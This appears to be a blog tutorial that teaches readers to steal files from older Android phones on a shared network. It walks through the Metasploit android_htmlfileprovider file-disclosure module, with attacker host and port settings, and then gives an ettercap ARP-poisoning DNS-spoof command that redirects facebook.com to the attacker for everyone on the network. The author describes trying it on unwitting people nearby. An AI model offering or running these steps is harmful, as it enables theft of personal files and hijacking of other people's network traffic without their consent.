A quick guide on how to steal data from an android device (smart phones, tablets etc) on your network. We will be using metasploit to launch the Android content provider file disclosure module. Next we will use ettercap to do dns spoofing through arp poisoning.
I will be giving a brief explanation on how to set up the attack as i do not have any sophisticated victim scenario set up. This will work on Android 2.2 or earlier, i have not done any test on other versions, lets see if we can get any free test subjects today. You may download the PDF version of this tutorial here.
Description
The Android content provider file disclosure module exploits a cross domain issue within the Android web browser to ex-filtrate files from a vulnerable device.
Lets Begin
1) Load up a terminal and type: msfconsole.
2) Next type : search android.
3) As shown in the image below, we have two matching modules.
4) For this tutorial we are going to use the first module. Type : info auxiliary/gather/android_htmlfileprovider.
5) Lets go through the important options that we must know.
a) FILE – If you have a particular location to steal a file from, this is where you redirect it. By default the auxiliary will steal the file from /proc/version,/proc/self/status,/data/system/packages.list.
b) SRVHOST – This is where you fill in your (attacker) IP address.
c) SRVPORT – By default this launches the auxiliary on port 8080.
d) URIPATH – By default this creates a random sub-link for your exploit. For example: http://192.168.1.47/fhsduhs. You can change it to anything you think that might help your attack, eg: http://192.168.1.47/wholovesjames.
6) Since i am not setting up a more sophisticated attack, i will leave the SSL options alone. This should do for now.
7) To use this module, type : use auxiliary/gather/android_htmlfileprovider.
8) set SRVHOST (Your Ip)
9) set SRVPORT 80 (I am setting this to 80 so it will be simpler to set up the dns spoofing later.)
10) set URIPATH / and finally type: exploit.
11) Ok so we have successfully launched the auxiliary. You can now take the link “http://192.168.1.47:80″ and give this to a friend using an Android device who is in the same network as you. Too much trouble , i know. So lets do some dns spoofing through arp poisoning with ettercap.
12) Open up another terminal screen (Ctrl-Shift T). Type : locate etter.dns.
13) Next type : nano (etter.dns).
14) As shown in the image below, i have decided to spoof facebook.com and i have redirected facebook.com to my ip address. Save it when you are done.
15) For a change lets launch ettercap through our terminal, type : ettercap -i wlan0 -T -q -P dns_spoof -M ARP:remote // //.
16) So set up is complete! Now when anyone on your network using an Android (vulnerable version) attempts to visit facebook.com, they will be redirected to your IP address. This does a mass attack on the network, so other users will be affected by the dns spoofing as well. In the real scenario, you will need to direct the attack to one specific ip address.
17) Once the android users loaded the malicious url, my terminal starts loading.
18) Sadly they were using version 4 and above which obviously is not vulnerable to this attack. As mentioned above, i believe this works on version 2.2 and below.
19) If!!! there were vulnerable Android users on the network, we would be able to steal data from their phone memory card etc. Also remember the set FILE option is where you direct the file to steal.
Remember metaspoit is available on backtrack 5
And bt5 is available on Droid
